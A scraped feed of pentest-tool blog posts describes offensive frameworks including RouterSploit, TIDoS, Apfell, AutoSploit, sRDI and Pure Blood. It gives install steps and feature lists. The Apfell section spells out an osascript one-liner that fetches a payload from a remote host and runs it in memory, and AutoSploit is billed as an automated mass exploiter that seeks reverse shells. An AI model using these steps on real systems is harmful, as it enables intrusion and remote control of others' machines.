EKFiddle – A Framework Based On The Fiddler Web Debugger To Study Exploit Kits, Malvertising And Malicious Traffic In General

A framework based on the Fiddler web debugger to study Exploit Kits, malvertising and malicious traffic in general.InstallationDownload and install the latest version of Fiddlerhttps://www.telerik.com/fiddlerSpecial instructions for Linux and Mac here:https://www.telerik.com/blogs/fiddler-for-linux-beta-is-herehttps://www.telerik.com/blogs/introducing-fiddler-for-os-x-beta-1Enable C# scripting (Windows only)Launch Fiddler, and go to Tools -> OptionsIn the Scripting tab, change the default (JScript.NET) to C#.Change default text editor (optional)In the same Tools -> Options menu, click on the Tools tab.Windows: notepad.exe or notepad++.exeLinux: geditMac: /Applications/TextEdit.app or /Applications/TextWrangler.appClose FiddlerDownload or clone CustomRules.cs into the appropriate folder based on your operating system:Windows (7/10) C:\Users\[username]\Documents\Fiddler2\Scripts\ Ubuntu /home/[username]/Fiddler2/Scripts/ Mac /Users/[username]/Fiddler2/Scripts/ Finish up the installationStart Fiddler to complete the installation of EKFiddle. That’s it, you’re all set!FeaturesToolbar buttonsThe added toolbar buttons give you quick shortcuts to some of the main features:QuickSaveDumps current web sessions into a SAZ named (QuickSave-“MM-dd-yyyy-HH-mm-ss".saz) to EKFiddle\Captures.UI modeToggle between the default column view or extra columns with additional information (includes time stamp, server IP and type, method, etc.).VPNVPN GUI directly built into Fiddler. It uses the OpenVPN client on Windows and Linux with ovpn files (sigining up with commercial VPN provider may be required). It will open up a new terminal/xterm whenever it connects to a new server via the selected .ovpn config file, killing the previous to ensure only one TAP adapter is used at any given time.WindowsDownload and install OpenVPN in default directoryPlace your .ovpn files inside OpenVPN’s config folder.Linux (tested on Ubuntu 16.04)sudo apt-get install openvpnPlace your .ovpn files in /etc/openvpn.ProxyAllows you to connect to an upstream proxy (HTTP/s or SOCKS).Import SAZ/PCAPA shortcut to load SAZ (Fiddler’s native format) or PCAP (i.e. from Wireshark) captures.View/Edit RegexesView and create your custom regular expressions. Note: a master list is provided with auto-updates via GitHub. Additionally the custom list lets you create your own rules.Run RegexesRun the master and custom regular expressions against current web sessions.Clear MarkingsClear any comment and colour highlighting in the currently loaded sessions.ContextAction menuThe ContextAction menu (accessed by right-clicking on any session(s) allows you to perform additional commands on selected sections. This can be very helpful to do quick lookups, compute hashes or extract IOCs.Hostname or IP address (Google Search, RiskIQ, URLQuery, RiskIQ)Query the hostname for the currently selected session.URIBuild RegexCreate a regular expression from the currently selected URI. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.Open in… Internet Explorer, Chrome, Firefox, EdgeThis opens up the URI with the browser you selected.Response BodyRemove encodingDecodes the currently selected sessions (from their basic encoding).Build RegexCreate a regular expression from the currently selected session’s source code. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.Calculate MD5/SHA256 hashGet the current session’s body and computes its hash.Hybrid Analysis / VirusTotal lookupChecks the current session’s body for hash, then look up that hash.Extract to DiskDownloads the currently selection session(s)’s body to disk, into the ‘Artifacts’ folder.Extract IOCsCopies into memory basic information from selected sessions so that they can be shared as IOCs.Connect-the-dotsAllows you to identify the sequence of events between sessions. Right-clik on the session you are interested in retracing your steps to and simply ‘connect the dots’. It will label the sequence of events from 01, to n within the comments column. You can reorder that column to have a condensed view of the sequence.CrawlerLoad a list of URLs from a text file and let the browser automically visit them. Tools -> Crawler (experimental) -> Start crawler May require some tweaks in your browser’s settings, in particular with regards to crash recovery IE: not needed Firefox: about:config, set -1 value for toolkit.startup.max_resumed_crashes Chrome: not needed Edge: fix already includedUninstalling EKFiddleDelete CustomRules.csDownload EKFiddle

Link: http://feedproxy.google.com/~r/PentestTools/~3/OrfyeIMprN4/ekfiddle-framework-based-on-fiddler-web.html

RouterSploit v3.3.0 – Exploitation Framework For Embedded Devices

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.It consists of various modules that aids penetration testing operations:exploits – modules that take advantage of identified vulnerabilitiescreds – modules designed to test credentials against network servicesscanners – modules that check if a target is vulnerable to any exploitpayloads – modules that are responsible for generating payloads for various architectures and injection pointsgeneric – modules that perform generic attacksInstallationRequirementsRequired:futurerequestsparamikopysnmppycryptoOptional:bluepy – bluetooth low energyInstallation on Kali Linuxapt-get install python3-pipgit clone https://www.github.com/threat9/routersploitcd routersploitpython3 -m pip install -r requirements.txtpython3 rsf.pyBluetooth Low Energy support:apt-get install libglib2.0-devpython3 -m pip install bluepypython3 rsf.pyInstallation on Ubuntu 18.04 & 17.10sudo add-apt-repository universesudo apt-get install git python3-pipgit clone https://www.github.com/threat9/routersploitcd routersploitpython3 -m pip install -r requirements.txtpython3 rsf.pyBluetooth Low Energy support:apt-get install libglib2.0-devpython3 -m pip install bluepypython3 rsf.pyInstallation on OSXgit clone https://www.github.com/threat9/routersploitcd routersploitsudo python3 -m pip install -r requirements.txtpython3 rsf.pyRunning on Dockergit clone https://www.github.com/threat9/routersploitcd routersploitdocker build -t routersploit .docker run -it –rm routersploitUpdateUpdate RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.cd routersploitgit pullDownload Routersploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/bGEb3P4Ibw4/routersploit-v330-exploitation.html

TIDoS Framework – The Offensive Web Application Penetration Testing Framework

TIDoS Framework is a comprehensive web-app audit framework. let’s keep this simpleHighlights :-The main highlights of this framework is:TIDoS Framework now boasts of a century+ of modules.A complete versatile framework to cover up everything from Reconnaissance to Vulnerability Analysis.Has 5 main phases, subdivided into 14 sub-phases consisting a total of 104 modules.Reconnaissance Phase has 48 modules of its own (including active and passive recon, information disclosure modules).Scanning & Enumeration Phase has got 15 modules (including port scans, WAF analysis, etc)Vulnerability Analysis Phase has 36 modules (including most common vulnerabilites in action).Exploits Castle has only 1 exploit. (purely developmental)And finally, Auxillaries have got 4 modules. under dev.All four phases each have a Auto-Awesome module which automates every module for you.You just need the domain, and leave everything is to this tool.TIDoS has full verbose out support, so you’ll know whats going on.Fully user friendly interaction environment. (no shits)Installation :Clone the repository locally and navigate there:git clone https://github.com/theinfecteddrake/tidos-framework.gitcd tidos-frameworkInstall the dependencies:chmod +x install./installThats it! Now you are good to go! Now lets run the tool:tidosGetting Started :-TIDoS is made to be comprehensive and versatile. It is a highly flexible framework where you just have to select and use modules.But before that, you need to set your own API KEYS for various OSINT purposes. To do so, open up API_KEYS.py under files/ directory and set your own keys and access tokens for SHODAN, CENSYS, FULL CONTACT, GOOGLE and WHATCMS. Public API KEYS and ACCESS TOKENS for SHODAN and WHATCMS have been provided with the TIDoS release itself. You can still add your own… no harm!Finally, as the framework opens up, enter the website name eg. http://www.example.com and let TIDoS lead you. Thats it! Its as easy as that.Recommended: Follow the order of the tool (Run in a schematic way). Reconnaissance ➣ Scanning & Enumeration ➣ Vulnerability Analysis To update this tool, use tidos_updater.py module under tools/ folder.Flawless Features :-TIDoS Framework presently supports the following: and is under active development Reconnaissance + OSINT Passive Reconnaissance: Nping Enumeration Via external APiWhoIS Lookup Domain info gatheringGeoIP Lookup Pinpoint physical locationDNS Configuration Lookup DNSDumpSubdomains Lookup Indexed onesReverse DNS Lookup Host InstancesReverse IP Lookup Hosts on same serverSubnets Enumeration Class BasedDomain IP History IP InstancesWeb Links Gatherer Indexed onesGoogle Search Manual searchGoogle Dorking (multiple modules) AutomatedEmail to Domain Resolver Email WhoIsWayback Machine Lookups Find BackupsBreached Email Check Pwned Email AccountsEnumeration via Google Groups Emails OnlyCheck Alias Availability Social NetworksFind PasteBin Posts Domain BasedLinkedIn Gathering Employees & CompanyGoogle Plus Gathering Domain ProfilesPublic Contact Info Scraping FULL CONTACTCensys Intel Gathering Domain BasedThreat Intelligence Gathering Bad IPsActive Reconnaissance Ping Enumeration AdvancedCMS Detection (185+ CMSs supported) IMPROVEDAdvanced Traceroute IMPROVEDrobots.txt and sitemap.xml CheckerGrab HTTP Headers Live CaptureFind HTTP Methods Allowed via OPTIONSDetect Server Type IMPROVEDExamine SSL Certificate AbsoluteApache Status Disclosure Checks File BasedWebDAV HTTP Enumeration PROFIND & SEARCHPHPInfo File Enumeration via BruteforceComments Scraper Regex BasedFind Shared DNS Hosts Name Server BasedAlternate Sites Discovery User-Agent BasedDiscover Interesting Files via Bruteforce Common Backdoor Locations shells, etc.Common Backup Locations .bak, .db, etc.Common Password Locations .pgp, .skr, etc.Common Proxy Path Configs. .pac, etc.Common Dot Files .htaccess, .apache, etcInformation Disclosure Credit Cards Disclosure If PlaintextEmail Harvester IMPROVEDFatal Errors Enumeration Includes Full Path DisclosureInternal IP Disclosure Signature BasedPhone Number Havester Signature BasedSocial Security Number Harvester US Ones Scanning & Enumeration Remote Server WAF Enumeration Generic 54 WAFsPort Scanning Ingenious Modules Simple Port Scanner via Socket ConnectionsTCP SYN Scan Highly reliableTCP Connect Scan Highly ReliableXMAS Flag Scan Reliable Only in LANsFin Flag Scan Reliable Only in LANsPort Service DetectorWeb Technology Enumeration AbsoluteOperating System Fingerprinting IMPROVEDBanner Grabbing of Services via Open PortsInteractive Scanning with NMap 16 preloaded modulesEnumeration Domain-Linked IPs Using CENSYS DatabaseWeb and Links CrawlersDepth 1 Indexed Uri CrawlerDepth 2 Single Page CrawlerDepth 3 Web Link Crawler Vulnerability Analysis Web-Bugs & Server Misconfigurations Insecure CORS AbsoluteSame-Site Scripting Sub-domain basedZone Transfer DNS Server basedClickjackingFrame-Busting ChecksX-FRAME-OPTIONS Header ChecksSecurity on CookiesHTTPOnly FlagSecure FlagCloudflare Misconfiguration CheckDNS Misconfiguration ChecksOnline Database Lookup For BreachesHTTP Strict Transport Security UsageHTTPS Enabled but no HSTSDomain Based Email SpoofingMissing SPF RecordsMissing DMARC RecordsHost Header InjectionPort Based Over HTTP 80X-Forwarded-For Header InjectionSecurity Headers Analysis Live CaptureCross-Site Tracing HTTP TRACE MethodSession Fixation via Cookie InjectionNetwork Security Misconfig.Checks for TELNET Enabled via Port 23Serious Web Vulnerabilities File InclusionsLocal File Inclusion (LFI) Param basedRemote File Inclusion (RFI) IMPROVED Parameter BasedPre-loaded Path BasedOS Command Injection Linux & Windows (RCE)Path Traversal (Sensitive Paths)Cross-Site Request Forgery AbsoluteSQL InjectionError Based InjectionCookie Value BasedReferer Value BasedUser-Agent Value BasedAuto-gathering IMPROVEDBlind Based Injection Crafted Payloads Cookie Value BasedReferer Value BasedUser-Agent Value BasedAuto-gathering IMPROVEDLDAP Injection Parameter BasedHTML Injection Parameter BasedBash Command Injection ShellShockXPATH Injection Parameter BasedCross-Site Scripting IMPROVED Cookie Value BasedReferer Value BasedUser-Agent Value BasedParameter Value Based ManualUnvalidated URL Forwards Open RedirectPHP Code Injection Windows + LinuxHTTP Response Splitting CRLF Injection User-Agent Value BasedParameter value Based ManualSub-domain Takeover 50+ Services Single Sub-domain ManualAll Subdomains AutomatedOther PlainText Protocol Default Credential Bruteforce FTP Protocol BruteforceSSH Protocol BruteforcePOP 2/3 Protocol BruteforceSQL Protocol BruteforceXMPP Protocol BruteforceSMTP Protocol BruteforceTELNET Protocol Bruteforce Auxillary Modules Hash Generator MD5, SHA1, SHA256, SHA512String & Payload Encoder 7 CategoriesForensic Image Analysis Metadata ExtractionWeb HoneyPot Probability ShodanLabs HoneyScore Exploitation purely developmental ShellShockOther Tools:net_info.py – Displays information about your network. Located under tools/.tidos_updater.py – Updates the framework to the latest release via signature matching. Located under `tools/’.TIDoS In Action:Version:v1.6 [latest release] [#stable]Upcoming:There are some bruteforce modules to be added:Some more of Enumeraton & Information Disclosure modules.Lots more of OSINT & Stuff (let that be a suspense).More of Auxillary Modules.Some Exploits are too being worked on.Known Bugs:This version of TIDoS is purely developmental and is presently stable. There are bugs in resolving the [99] Back at various end-points which results in blind fall-backs. Though I have added global exception handling, still, there maybe bugs out there. Also TIDoS needs to develop more on logging all info displayed on the screen (help needed).Disclaimer:TIDoS is provided as a offensive web application audit framework. It has built-in modules which can reveal potential misconfigurations and vulnerabilties in web applications which could possibly be exploited maliciously.THEREFORE, I AM NOT EXCLUSIVELY RESPONSIBLE FOR ANY MISUSE OF THIS TOOLKIT.Download TIDoS-Framework

Link: http://feedproxy.google.com/~r/PentestTools/~3/dCgUcSrbBrM/tidos-framework-offensive-web.html

Apfell – A macOS, Post-Exploit, Red Teaming Framework

A macOS, post-exploit, red teaming framework built with python3 and JavaScript. It’s designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout mac and linux based red teaming.DetailsCheck out thre blog post on the initial release of the framework and what the bare bones content can do.InstallationGet the code from this github:git clone https://github.com/its-a-feature/ApfellInstall and setup the requirements (Note: The Sanic webserver says it only works on Linux):# The setup.sh will install postgres and pip3 install the requirementscd Apfell && chmod +x setup.sh && sudo ./setup.sh && cd ..Configure the installation in app/__init__.py:# ——– CONFIGURE SETTINGS HERE ———–db_name = ‘apfell_db’db_user = ‘apfell_user’db_pass = ‘super_secret_apfell_user_password’server_ip = ‘127.0.0.1’ # this will be used by the browser to callback here, edit this!listen_port = ‘443’listen_ip = ‘0.0.0.0’ # IP to bind to for the server, 0.0.0.0 means all local IPv4 addressesssl_cert_path = ‘./app/ssl/apfell-cert.pem’ssl_key_path = ‘./app/ssl/apfell-ssl.key’use_ssl = TrueThere is currently an issue with Sanic and websockets 6/7 (tracked issue, but no pull request yet) You need to edit Sanic with a slight update (I’m going to make a pull request for Sanic so we don’t need to do this, but that’ll take a little while). In the meantime, do sudo find / -type f -name “app.py" to find the appropriate Sanic file to edit. In here, find the line that says protocol = request.transport._protocol and edit it to be:if hasattr(request.transport, ‘_app_protocol’) protocol = request.transport._app_protocolelse: protocol = request.transport._protocolUsageStart the server:python3 server.py [2018-07-16 14:39:14 -0700] [28381] [INFO] Goin’ Fast @ https://0.0.0.0:443By default, the server will bind to 0.0.0.0 on port 443. This is an alias meaning that it will be listening on all IPv4 addresses on the machine. You don’t actually browse to https://0.0.0.0:443 in your browser. Instead, you’ll browse to either https://localhost:443 if you’re on the same machine that’s running the server, or you can browse to any of the IPv4 addresses on the machine that’s running the server. You could also browse to the IP address you specified in server_ip = ‘192.168.0.119’ in the installation section.Browse to the server with any modern web browser Create a new user: Create a new payload:Use the attacks_api to host the new file (this will eventually get updated with a GUI): # assuming we created a payload in our local ‘/tmp’ directorycurl -X POST'{"port":8080, "directory":"/tmp"}’ https://192.168.0.119/api/v1.0/attacks/host_fileThis will start a python simple web server in the /tmp directory on port 8080.Pull down and execute payload in memory:osascript -l JavaScript -e "eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString(‘HTTP://192.168.0.119:8080/apfell-jxa’)),$.NSUTF8StringEncoding)));" Interact with the new RAT: Download Apfell

Link: http://feedproxy.google.com/~r/PentestTools/~3/9wqU15O2-l4/apfell-macos-post-exploit-red-teaming.html

AutoSploit v2.2 – Automated Mass Exploiter

As the name might suggest AutoSploit attempts to automate the exploitation of remote hosts. Targets can be collected automatically through Shodan, Censys or Zoomeye. But options to add your custom targets and host lists have been included as well. The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured by filling out the dialog that comes up before the exploit component is startedOperational Security ConsiderationReceiving back connections on your local machine might not be the best idea from an OPSEC standpoint. Instead consider running this tool from a VPS that has all the dependencies required, available.The new version of AutoSploit has a feature that allows you to set a proxy before you connect and a custom user-agent.Helpful linksUsageInstallingDependenciesUser Manual Extensive usage breakdownScreenshotsReporting bugs/ideasDevelopment guidelinesShoutoutsDevelopmentDiscord serverREADME translationsInstallationInstalling AutoSploit is very simple, you can find the latest stable release here. You can also download the master branch as a zip or tarball or follow one of the below methods;Cloningsudo -s << EOFgit clone https://github.com/NullArray/Autosploit.gitcd AutoSploitchmod +x install.sh./install.shpython2 autosploit.pyEOFDockersudo -s << EOFgit clone https://github.com/NullArray/AutoSploit.gitcd AutoSploitchmod +x install.sh./installshcd AutoSploit/Dockerdocker network create -d bridge haknetdocker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgresdocker build -t autosploit .docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploitEOFOn any Linux system the following should work;git clone https://github.com/NullArray/AutoSploitcd AutoSploitchmod +x install.sh./install.shIf you want to run AutoSploit on a macOS system, AutoSploit is compatible with macOS, however, you have to be inside a virtual environment for it to run successfully. To do this, do the following;sudo -s << '_EOF'pip2 install virtualenv --usergit clone https://github.com/NullArray/AutoSploit.gitvirtualenv <PATH-TO-YOUR-ENV>source <PATH-TO-YOUR-ENV>/bin/activatecd <PATH-TO-AUTOSPLOIT>pip2 install -r requirements.txtchmod +x install.sh./install.shpython autosploit.py_EOFMore information on running Docker can be found hereUsageStarting the program with python autosploit.py will open an AutoSploit terminal session. The options for which are as follows.1. Usage And Legal2. Gather Hosts3. Custom Hosts4. Add Single Host5. View Gathered Hosts6. Exploit Gathered Hosts99. QuitChoosing option 2 will prompt you for a platform specific search query. Enter IIS or Apache in example and choose a search engine. After doing so the collected hosts will be saved to be used in the Exploit component.As of version 2.0 AutoSploit can be started with a number of command line arguments/flags as well. Type python autosploit.py -h to display all the options available to you. I’ve posted the options below as well for reference.usage: python autosploit.py -[c|z|s|a] -[q] QUERY [-C] WORKSPACE LHOST LPORT [-e] [–whitewash] PATH [–ruby-exec] [–msf-path] PATH [-E] EXPLOIT-FILE-PATH [–rand-agent] [–proxy] PROTO://IP:PORT [-P] AGENToptional arguments: -h, –help show this help message and exitsearch engines: possible search engines to use -c, –censys use censys.io as the search engine to gather hosts -z, –zoomeye use zoomeye.org as the search engine to gather hosts -s, –shodan use shodan.io as the search engine to gather hosts -a, –all search all available search engines to gather hostsrequests: arguments to edit your requests –proxy PROTO://IP:PORT run behind a proxy while performing the searches –random-agent use a random HTTP User-Agent header -P USER-AGENT, –personal-agent USER-AGENT pass a personal User-Agent to use for HTTP requests -q QUERY, –query QUERY pass your search queryexploits: arguments to edit your exploits -E PATH, –exploit-file PATH provide a text file to convert into JSON and save for later use -C WORKSPACE LHOST LPORT, –config WORKSPACE LHOST LPORT set the configuration for MSF (IE -C default 127.0.0.1 8080) -e, –exploit start exploiting the already gathered hostsmisc arguments: arguments that don’t fit anywhere else –ruby-exec if you need to run the Ruby executable with MSF use this –msf-path MSF-PATH pass the path to your framework if it is not in your ENV PATH –whitelist PATH only exploit hosts listed in the whitelist fileIf you want to run AutoSploit on a macOS system, AutoSploit is compatible with macOS, however, you have to be inside a virtual environment for it to run successfully. To do this, do the following;sudo -s << ‘_EOF’ pip2 install virtualenv –usergit clone https://github.com/NullArray/AutoSploit.gitvirtualenv <PATH-TO-YOUR-ENV>source <PATH-TO-YOUR-ENV>/bin/activatecd <PATH-TO-AUTOSPLOIT>pip2 install -r requirements.txtchmod +x install.sh./install.shpython autosploit.py_EOFDependenciesNote: All dependencies should be installed using the above installation method, however, if you find they are not:AutoSploit depends on the following Python2.7 modules.requestspsutilShould you find you do not have these installed get them with pip like so.pip install requests psutilorpip install -r requirements.txtSince the program invokes functionality from the Metasploit Framework you need to have this installed also. Get it from Rapid7 by clicking here.Download AutoSploit v2.2

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZT_17-GzAcc/autosploit-v22-automated-mass-exploiter.html

OWTF v2.4 – Offensive Web Testing Framework

OWASP OWTF is a project focused on penetration testing efficiency and alignment of security tests to security standards like the OWASP Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST so that pentesters will have more time toSee the big picture and think out of the boxMore efficiently find, verify and combine vulnerabilitiesHave time to investigate complex vulnerabilities like business logic/architectural flaws or virtual hosting sessionsPerform more tactical/targeted fuzzing on seemingly risky areasDemonstrate true impact despite the short timeframes we are typically given to test.The tool is highly configurable and anybody can trivially create simple plugins or add new tests in the configuration files without having any development experience.Note: This tool is however not a silverbullet and will only be as good as the person using it: Understanding and experience will be required to correctly interpret tool output and decide what to investigate further in order to demonstrate impact.RequirementsOWTF is developed on KaliLinux and macOS but it is made for Kali Linux (or other Debian derivatives)OWTF supports both Python2 and Python3.InstallationRecommended:Using a virtualenv is highly recommended!pip install git+https://github.com/owtf/owtf#egg=owtfor clone the repo andpython setup.py installIf you want to change the database password in the Docker Compose setup, edit the environment variables in the docker-compose.yml file. If you prefer to override the environment variables in a .env file, use the file name owtf.env so that Docker Compose knows to include it.To run OWTF on Windows or MacOS, OWTF uses Docker Compose. You need to have Docker Compose installed (check by docker-compose -v). After installing Docker Compose, simply run docker-compose up and open localhost:8009 for the OWTF web interface.Install on OSXDependencies: Install Homebrew (https://brew.sh/) and follow the steps given below:$ virtualenv $ source <venv name>/bin/activate $ brew install coreutils gnu-sed openssl # We need to install ‘cryptography’ first to avoid issues $ pip install cryptography –global-option=build_ext –global-option=”-L/usr/local/opt/openssl/lib" –global-option="-I/usr/local/opt/openssl/include" $ git clone <this repo> $ cd owtf $ python setup.py install # Run OWTF! $ owtf FeaturesResilience: If one tool crashes OWTF, will move on to the next tool/test, saving the partial output of the tool until it crashed.Flexible: Pause and resume your work.Tests Separation: OWTF separates its traffic to the target into mainly 3 types of plugins:Passive : No traffic goes to the targetSemi Passive : Normal traffic to targetActive: Direct vulnerability probingExtensive REST API.Has almost complete OWASP Testing Guide(v3, v4), Top 10, NIST, CWE coverage.Web interface: Easily manage large penetration engagements easily.Interactive report:Automated plugin rankings from the tool output, fully configurable by the user.Configurable risk rankingsIn-line notes editor for each plugin.LinksProject homepageIRCWikiSlack and join channel #project-owtfUser DocumentationYoutube channelSlideshareBlogScreenshotsDownload OWTF

Link: http://feedproxy.google.com/~r/PentestTools/~3/QhjPP8mfh-A/owtf-v24-offensive-web-testing-framework.html

sRDI – Shellcode Implementation Of Reflective DLL Injection

sRDI allows for the conversion of DLL files to position independent shellcode.Functionality is accomplished via two components:C project which compiles a PE loader implementation (RDI) to shellcodeConversion code which attaches the DLL, RDI, and user data together with a bootstrapThis project is comprised of the following elements:ShellcodeRDI: Compiles shellcode for the DLL loaderNativeLoader: Converts DLL to shellcode if neccesarry, then injects into memoryDotNetLoader: C# implementation of NativeLoaderPython\ConvertToShellcode.py: Convert DLL to shellcode in placePython\EncodeBlobs.py: Encodes compiled sRDI blobs for static embeddingPowerShell\ConvertTo-Shellcode.ps1: Convert DLL to shellcode in placeFunctionTest: Imports sRDI C function for debug testingTestDLL: Example DLL that includes two exported functions for call on Load and afterThe DLL does not need to be compiled with RDI, however the technique is cross compatiable.Use Cases / ExamplesBefore use, is recommend to you become familiar with Reflective DLL Injection and it’s purpose.Convert DLL to shellcode using pythonfrom ShellcodeRDI import *dll = open(“TestDLL_x86.dll", ‘rb’).read()shellcode = ConvertToShellcode(dll)Load DLL into memory using C# loaderDotNetLoader.exe TestDLL_x64.dllConvert DLL with python script and load with Native EXEpython ConvertToShellcode.py TestDLL_x64.dllNativeLoader.exe TestDLL_x64.binConvert DLL with powershell and load with Invoke-ShellcodeImport-Module .\Invoke-Shellcode.ps1Import-Module .\ConvertTo-Shellcode.ps1Invoke-Shellcode -Shellcode (ConvertTo-Shellcode -File TestDLL_x64.dll)Stealth ConsiderationsThere are many ways to detect memory injection. The loader function implements two stealth improvments on traditional RDI:Proper Permissions: When relocating sections, memory permissions are set based on the section characteristics rather than a massive RWX blob.PE Header Cleaning (Optional): The DOS Header and DOS Stub for the target DLL are completley wiped with null bytes on load (Except for e_lfanew). This can be toggled with 0x1 in the flags argument for C/C#, or via command line args in Python/Powershell.BuildingThis project is built using Visual Studio 2015 (v140) and Windows SDK 8.1. The python script is written using Python 3.The Python and Powershell scripts are located at:Python\ConvertToShellcode.pyPowerShell\ConvertTo-Shellcode.ps1After building the project, the other binaries will be located at:bin\NativeLoader.exebin\DotNetLoader.exebin\TestDLL_.dllbin\ShellcodeRDI_.binDownload sRDI

Link: http://feedproxy.google.com/~r/PentestTools/~3/L7k0Is7EfEY/srdi-shellcode-implementation-of.html

Pure Blood v2.0 – A Penetration Testing Framework Created For Hackers / Pentester / Bug Hunter

A Penetration Testing Framework created for Hackers / Pentester / Bug Hunter.Web Pentest / Information Gathering:Banner GrabWhoisTracerouteDNS RecordReverse DNS LookupZone Transfer LookupPort ScanAdmin Panel ScanSubdomain ScanCMS IdentifyReverse IP LookupSubnet LookupExtract Page LinksDirectory Fuzz (NEW)File Fuzz (NEW)Shodan Search (NEW)Shodan Host Lookup (NEW)Web Application Attack: (NEW)Wordpress     | WPScan     | WPScan Bruteforce     | WordPress Plugin Vulnerability Checker         Features: // I will add more soon.         | WordPress Woocommerce – Directory Craversal         | WordPress Plugin Booking Calendar 3.0.0 – SQL Injection / Cross-Site Scripting         | WordPress Plugin WP with Spritz 1.0 – Remote File Inclusion         | WordPress Plugin Events Calendar – ‘event_id’ SQL InjectionAuto SQL Injection     Features:     | Union Based     | (Error Output = False) Detection     | Tested on 100+ WebsitesGenerator:Deface PagePassword Generator // NEWText To Hash //NEWInstallationAny Python Version.$ git clone https://github.com/cr4shcod3/pureblood$ cd pureblood$ pip install -r requirements.txtDEMOWeb Pentest Web Application Attack Build WithColoramaRequestsPython-whoisDnspythonBeautifulSoupShodanAuthorsCr4sHCoD3 – Pure BloodDownload Pure Blood v2.0

Link: http://feedproxy.google.com/~r/PentestTools/~3/PcrKCodaoSA/pure-blood-v20-penetration-testing.html

Pure Blood – A Penetration Testing Framework Created For Hackers / Pentester / Bug Hunter

A Penetration Testing Framework created for Hackers / Pentester / Bug HunterMenuWeb Pentest | Banner Grab | Whois | Traceroute | DNS Record | Reverse DNS Lookup | Zone Transfer Lookup | Port Scan | Admin Panel Scan | Subdomain Scan | CMS Identify | Reverse IP Lookup | Subnet Lookup | Extract Page LinksGenerator | Deface PageInstallationAny Python Version.Modules$ pip install -r requirements.txt OR$ pip install colorama requests python-whois dnspython bs4Path (Optional)Linux$ sudo nano ~/.bashrc# Add this in the bottom of the fileexport PATH=$PATH:/pureblood$ pureblood.pyWindowsWindows Search > Edit The System Environment Variables > Environment Variables > Path > Edit > New > (Path to the Tool) > Ok > Ok > Apply / Ok$ purebloodMAC$ nano /etc/paths# Add this in the bottom of the fileexport PATH=$PATH:<Path of the Tool>/pureblood/$ pureblood.pyAndroid (Termux / GNURoot)$ nano ~/.bashrc# Add this in the bottom of the fileexport PATH=$PATH:<Path of the Tool>/pureblood/$ pureblood.pyBuild WithColoramaRequestsPython-whoisDnspythonBeautifulSoupAuthorsCr4sHCoD3 – Pure BloodDownload Pureblood

Link: http://feedproxy.google.com/~r/PentestTools/~3/Rj8IZDAp3ZU/pure-blood-penetration-testing.html

Orbit – Cryptocurrency Wallets Relationship Visualizer

Give it a blockchain based crypto wallet address and it will crawl 3 levels deep in transaction data to plot a graph out of the information.UsageRun orbit.py with python3 as followspython3 orbit.pyEnter the wallet address __ | | _ | ‘ _|_ |__| | |) | | Enter a wallet address: xxxxxxxxxxxxxxxNow orbit will scrape wallets through blockchain API and once its done, a json file will be generated.Next thing is to plot a graph for which we will be using quark framework which is also written by me :DClone Quark and navigate to the Quark directory and feed the json file to quark.py as follows:python quark.py /path/to/file.jsonAnd that’s it! Your job is done here, open quark.html to see your graph ^_^Warning!The size of nodes (dots) and edges (lines) depends on the transactions made by that address to other members of the scope.So the size of nodes can be ridiculosly big but don’t get scared, just click on stabilize option in the sidebar and leave the rest to quark.Also, if the node lables are getting on the way, click on the Node Lables option to turn that off.The last thing is that there are going to be a lot of nodes that aren’t interesting like a wallet that has made only one transaction. Such nodes will just make your graph ugly. To fix this, click on the clean option which will delete such insignificant nodes. More information about how to interact with the graph can be found on Quark’s readme.Download Orbit

Link: http://feedproxy.google.com/~r/PentestTools/~3/Cm17VA36mFE/orbit-cryptocurrency-wallets.html